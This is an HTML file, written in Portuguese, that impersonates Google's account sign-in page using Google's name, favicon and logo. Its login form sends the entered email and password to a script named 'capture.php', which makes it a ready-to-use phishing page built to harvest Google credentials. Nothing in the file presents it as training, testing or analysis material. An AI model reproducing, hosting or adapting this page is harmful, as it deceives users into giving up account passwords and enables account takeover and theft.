<!DOCTYPE html>
<html lang="pt-br">
<head>
  <meta charset="UTF-8">
  <title>Fazer login – contas do Google</title>
  <link rel="icon" href="https://www.google.com/favicon.ico">
  <style>
    body {
      font-family: Roboto, Arial, sans-serif;
      background-color: #f2f2f2;
      margin: 0;
      padding: 0;
    }

    .login-box {
      width: 360px;
      margin: 100px auto;
      background-color: white;
      border-radius: 8px;
      padding: 40px;
      box-shadow: 0 2px 4px rgba(0,0,0,0.2);
      text-align: center;
    }

    .login-box img {
      width: 75px;
      margin-bottom: 20px;
    }

    h1 {
      font-size: 24px;
      margin-bottom: 10px;
    }

    input[type="email"],
    input[type="password"] {
      width: 100%;
      padding: 12px;
      margin: 10px 0;
      box-sizing: border-box;
      border: 1px solid #ccc;
      border-radius: 4px;
    }

    button {
      width: 100%;
      padding: 12px;
      background-color: #1a73e8;
      border: none;
      color: white;
      font-size: 16px;
      border-radius: 4px;
      cursor: pointer;
      margin-top: 20px;
    }

    button:hover {
      background-color: #0c5fd4;
    }

    .footer {
      margin-top: 20px;
      font-size: 12px;
      color: #555;
    }
  </style>
</head>
<body>
  <div class="login-box">
    <img src="https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_92x30dp.png" alt="Google">
    <h1>Fazer login</h1>
    <form action="capture.php" method="POST">
      <input type="email" name="email" placeholder="Email ou telefone" required>
      <input type="password" name="senha" placeholder="Digite sua senha" required>
      <button type="submit">Próxima</button>
    </form>
    <div class="footer">Não está no seu computador? Use uma janela de navegação anônima para fazer login.</div>
  </div>
</body>
</html>
